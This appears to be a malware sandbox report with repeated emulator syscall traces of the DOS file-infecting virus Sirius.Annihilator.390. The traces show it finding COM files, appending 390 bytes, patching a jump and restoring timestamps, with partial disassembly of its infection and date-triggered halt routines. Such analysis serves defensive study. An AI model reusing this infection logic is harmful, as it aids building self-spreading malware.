Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.390

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:30:56.890951164Z	26	PC: 14113 \| Set disk transfer address
2018-12-17T22:30:56.892308019Z	78	PC: 14127 \| Find first file
2018-12-17T22:30:56.900449231Z	61	PC: 14134 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:30:56.908185916Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:56.910051703Z	62	PC: 1415b \| Close file
2018-12-17T22:30:56.91307001Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:56.916533839Z	61	PC: 14134 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:30:56.924468395Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:56.927069692Z	62	PC: 1415b \| Close file
2018-12-17T22:30:56.929574928Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:56.932962103Z	61	PC: 14134 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:30:56.949227971Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:56.951180423Z	62	PC: 1415b \| Close file
2018-12-17T22:30:56.95359965Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:56.958043421Z	61	PC: 14134 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:30:56.965704981Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:56.967674709Z	62	PC: 1415b \| Close file
2018-12-17T22:30:56.970018494Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:56.974924573Z	61	PC: 14134 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:30:56.982494449Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:56.98471845Z	62	PC: 1415b \| Close file
2018-12-17T22:30:56.988211379Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:56.991234618Z	61	PC: 14134 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:30:56.999090886Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.002373267Z	62	PC: 1415b \| Close file
2018-12-17T22:30:57.004834648Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:57.008026815Z	61	PC: 14134 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:30:57.01684824Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.018900669Z	62	PC: 1415b \| Close file
2018-12-17T22:30:57.021279871Z	79	PC: 14127 \| Find next file
2018-12-17T22:30:57.02443445Z	61	PC: 14134 \| Open file (Filename = 'TEST.COM')
2018-12-17T22:30:57.032123348Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.039896537Z	87	PC: 1414b \| Get or set file date and time
2018-12-17T22:30:57.045742399Z	44	PC: 1416b \| Get time 0x1416b: or dx, dx 0x1416d: je 0x14167 0x1416f: mov word ptr [bp + 0x289], dx 0x14173: mov ax, 0x4200 0x14176: call 0x14200 0x14179: mov ah, 0x3f 0x1417b: lea dx, word ptr [bp + 0x22b] 0x1417f: mov cx, 3 0x14182: int 0x21 0x14184: cmp byte ptr [bp + 0x22b], 0x4d 0x14189: je 0x14157 0x1418b: cmp byte ptr [bp + 0x22b], 0x5a 0x14190: je 0x14157 0x14192: mov ax, 0x4202 0x14195: call 0x14200 0x14198: sub ax, 3 0x1419b: mov word ptr cs:[bp + 0x229], ax 0x141a0: lea si, word ptr [bp + 0x106] 0x141a4: mov di, 0xfb90 0x141a7: mov cx, 0x186
2018-12-17T22:30:57.049727703Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.051344253Z	63	PC: 14184 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:30:57.054243844Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.057203858Z	64	PC: 141bd \| Write file or device (Write 390 bytes on handle 5)
2018-12-17T22:30:57.060780818Z	66	PC: 14206 \| Move file pointer
2018-12-17T22:30:57.062403621Z	64	PC: 141ce \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:30:57.066387467Z	87	PC: 141d5 \| Get or set file date and time
2018-12-17T22:30:57.068805356Z	62	PC: 141d9 \| Close file
2018-12-17T22:30:57.098346495Z	42	PC: 141dd \| Get date 0x141dd: cmp dh, dl 0x141df: jne 0x141f4 0x141e1: mov ah, 0x2c 0x141e3: int 0x21 0x141e5: and dh, 7 0x141e8: jne 0x141f4 0x141ea: mov ah, 9 0x141ec: lea dx, word ptr [bp + 0x234] 0x141f0: int 0x21 0x141f2: cli 0x141f3: hlt 0x141f4: mov ah, 0x1a 0x141f6: mov dx, 0x80 0x141f9: int 0x21 0x141fb: mov ax, 0x100 0x141fe: push ax 0x141ff: ret 0x14200: xor cx, cx 0x14202: xor dx, dx 0x14204: int 0x21
2018-12-17T22:30:57.101171187Z	26	PC: 141fb \| Set disk transfer address
2018-12-17T22:30:57.103086256Z	48	PC: 12a63 \| Get DOS version
2018-12-17T22:30:57.104417578Z	9	PC: 12a7a \| Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:30:57.131587537Z	61	PC: 12cb7 \| Open file (Filename = '')
2018-12-17T22:30:57.140280498Z	9	PC: 12a88 \| Display string (String= 'Self test: ')
2018-12-17T22:30:57.142967936Z	93	PC: 12b24 \| File sharing functions
2018-12-17T22:30:57.14525067Z	9	PC: 12b03 \| Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-17T22:30:57.152034103Z	76	PC: 12b09 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5533,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:43.736774913Z	26	PC: 14113 \| Set disk transfer address
2018-12-25T11:54:43.738504022Z	78	PC: 14127 \| Find first file
2018-12-25T11:54:43.745407262Z	61	PC: 14134 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:43.752585373Z	66	PC: 14206 \| Move file pointer
2018-12-25T11:54:43.75482896Z	62	PC: 1415b \| Close file
2018-12-25T11:54:43.756480446Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.758788493Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.770798671Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.772285047Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.773885872Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.777165641Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.783433418Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.784685787Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.786509954Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.789322297Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.79556933Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.796820383Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.79918175Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.801637441Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.809315117Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.811423452Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.813057908Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.815357737Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.82283416Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.824257661Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.825930141Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.829586301Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.8359175Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.83721246Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:43.839397013Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:43.842429854Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:43.848702294Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.850478631Z	87	PC: 1414b \| Get or set file date and time
2018-12-25T11:54:43.854849383Z	44	PC: 1416b \| Get time 0x1416b: or dx, dx 0x1416d: je 0x14167 0x1416f: mov word ptr [bp + 0x289], dx 0x14173: mov ax, 0x4200 0x14176: call 0x14200 0x14179: mov ah, 0x3f 0x1417b: lea dx, word ptr [bp + 0x22b] 0x1417f: mov cx, 3 0x14182: int 0x21 0x14184: cmp byte ptr [bp + 0x22b], 0x4d 0x14189: je 0x14157 0x1418b: cmp byte ptr [bp + 0x22b], 0x5a 0x14190: je 0x14157 0x14192: mov ax, 0x4202 0x14195: call 0x14200 0x14198: sub ax, 3 0x1419b: mov word ptr cs:[bp + 0x229], ax 0x141a0: lea si, word ptr [bp + 0x106] 0x141a4: mov di, 0xfb90 0x141a7: mov cx, 0x186
2018-12-25T11:54:43.856921203Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.85836253Z	63	PC: 14184 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:43.864730819Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.866040259Z	64	PC: 141bd \| Write file or device (Write 390 bytes on handle 5)
2018-12-25T11:54:43.873459952Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:43.875321223Z	64	PC: 141ce \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:54:43.878286249Z	87	PC: 141d5 \| Get or set file date and time
2018-12-25T11:54:43.887750509Z	62	PC: 141d9 \| Close file
2018-12-25T11:54:43.900810979Z	42	PC: 141dd \| Get date 0x141dd: cmp dh, dl 0x141df: jne 0x141f4 0x141e1: mov ah, 0x2c 0x141e3: int 0x21 0x141e5: and dh, 7 0x141e8: jne 0x141f4 0x141ea: mov ah, 9 0x141ec: lea dx, word ptr [bp + 0x234] 0x141f0: int 0x21 0x141f2: cli 0x141f3: hlt 0x141f4: mov ah, 0x1a 0x141f6: mov dx, 0x80 0x141f9: int 0x21 0x141fb: mov ax, 0x100 0x141fe: push ax 0x141ff: ret 0x14200: xor cx, cx 0x14202: xor dx, dx 0x14204: int 0x21
2018-12-25T11:54:43.903123593Z	44	PC: 141e5 \| Get time 0x141e5: and dh, 7 0x141e8: jne 0x141f4 0x141ea: mov ah, 9 0x141ec: lea dx, word ptr [bp + 0x234] 0x141f0: int 0x21 0x141f2: cli 0x141f3: hlt 0x141f4: mov ah, 0x1a 0x141f6: mov dx, 0x80 0x141f9: int 0x21 0x141fb: mov ax, 0x100 0x141fe: push ax 0x141ff: ret 0x14200: xor cx, cx 0x14202: xor dx, dx 0x14204: int 0x21 0x14206: ret 0x14207: jmp 0x15a32 0x1420a: jmp 0x158af 0x1420d: sub ch, byte ptr [0x6f63]
2018-12-25T11:54:43.905752147Z	26	PC: 141fb \| Set disk transfer address
2018-12-25T11:54:43.907246523Z	48	PC: 12a63 \| Get DOS version
2018-12-25T11:54:43.908341104Z	9	PC: 12a7a \| Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-25T11:54:43.91776034Z	61	PC: 12cb7 \| Open file (Filename = '')
2018-12-25T11:54:43.92532267Z	9	PC: 12a88 \| Display string (String= 'Self test: ')
2018-12-25T11:54:43.928861346Z	93	PC: 12b24 \| File sharing functions
2018-12-25T11:54:43.931001013Z	9	PC: 12b03 \| Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-25T11:54:43.935770187Z	76	PC: 12b09 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5533,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:54:44.466326657Z	26	PC: 14113 \| Set disk transfer address
2018-12-25T11:54:44.467989285Z	78	PC: 14127 \| Find first file
2018-12-25T11:54:44.47427019Z	61	PC: 14134 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:44.481235022Z	66	PC: 14206 \| Move file pointer
2018-12-25T11:54:44.486491741Z	62	PC: 1415b \| Close file
2018-12-25T11:54:44.488268097Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.490729981Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.498445274Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.5054159Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.50688225Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.508862138Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.51486331Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.516372735Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.518019283Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.522212923Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.528593159Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.543293683Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.546006482Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.550218125Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.556973532Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.558571459Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.560047746Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.567064562Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.591410542Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.593225833Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.596230006Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.59953428Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.604026718Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.605220465Z	62	PC: 1415b \| Close file (See above)
2018-12-25T11:54:44.610816459Z	79	PC: 14127 \| Find next file (See above)
2018-12-25T11:54:44.613358359Z	61	PC: 14134 \| Open file (See above)
2018-12-25T11:54:44.618025525Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.619991332Z	87	PC: 1414b \| Get or set file date and time
2018-12-25T11:54:44.623049011Z	44	PC: 1416b \| Get time 0x1416b: or dx, dx 0x1416d: je 0x14167 0x1416f: mov word ptr [bp + 0x289], dx 0x14173: mov ax, 0x4200 0x14176: call 0x14200 0x14179: mov ah, 0x3f 0x1417b: lea dx, word ptr [bp + 0x22b] 0x1417f: mov cx, 3 0x14182: int 0x21 0x14184: cmp byte ptr [bp + 0x22b], 0x4d 0x14189: je 0x14157 0x1418b: cmp byte ptr [bp + 0x22b], 0x5a 0x14190: je 0x14157 0x14192: mov ax, 0x4202 0x14195: call 0x14200 0x14198: sub ax, 3 0x1419b: mov word ptr cs:[bp + 0x229], ax 0x141a0: lea si, word ptr [bp + 0x106] 0x141a4: mov di, 0xfb90 0x141a7: mov cx, 0x186
2018-12-25T11:54:44.625555985Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.62814004Z	63	PC: 14184 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:44.630270262Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.63137573Z	64	PC: 141bd \| Write file or device (Write 390 bytes on handle 5)
2018-12-25T11:54:44.633971868Z	66	PC: 14206 \| Move file pointer (See above)
2018-12-25T11:54:44.635658314Z	64	PC: 141ce \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:54:44.638814024Z	87	PC: 141d5 \| Get or set file date and time
2018-12-25T11:54:44.641944086Z	62	PC: 141d9 \| Close file
2018-12-25T11:54:44.655922802Z	42	PC: 141dd \| Get date 0x141dd: cmp dh, dl 0x141df: jne 0x141f4 0x141e1: mov ah, 0x2c 0x141e3: int 0x21 0x141e5: and dh, 7 0x141e8: jne 0x141f4 0x141ea: mov ah, 9 0x141ec: lea dx, word ptr [bp + 0x234] 0x141f0: int 0x21 0x141f2: cli 0x141f3: hlt 0x141f4: mov ah, 0x1a 0x141f6: mov dx, 0x80 0x141f9: int 0x21 0x141fb: mov ax, 0x100 0x141fe: push ax 0x141ff: ret 0x14200: xor cx, cx 0x14202: xor dx, dx 0x14204: int 0x21
2018-12-25T11:54:44.668457073Z	26	PC: 141fb \| Set disk transfer address
2018-12-25T11:54:44.670508522Z	48	PC: 12a63 \| Get DOS version
2018-12-25T11:54:44.675895578Z	9	PC: 12a7a \| Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-25T11:54:44.685717372Z	61	PC: 12cb7 \| Open file (Filename = '')
2018-12-25T11:54:44.69270643Z	9	PC: 12a88 \| Display string (String= 'Self test: ')
2018-12-25T11:54:44.696878578Z	93	PC: 12b24 \| File sharing functions
2018-12-25T11:54:44.699035557Z	9	PC: 12b03 \| Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-25T11:54:44.703250884Z	76	PC: 12b09 \| Terminate with return code (Return code = '1')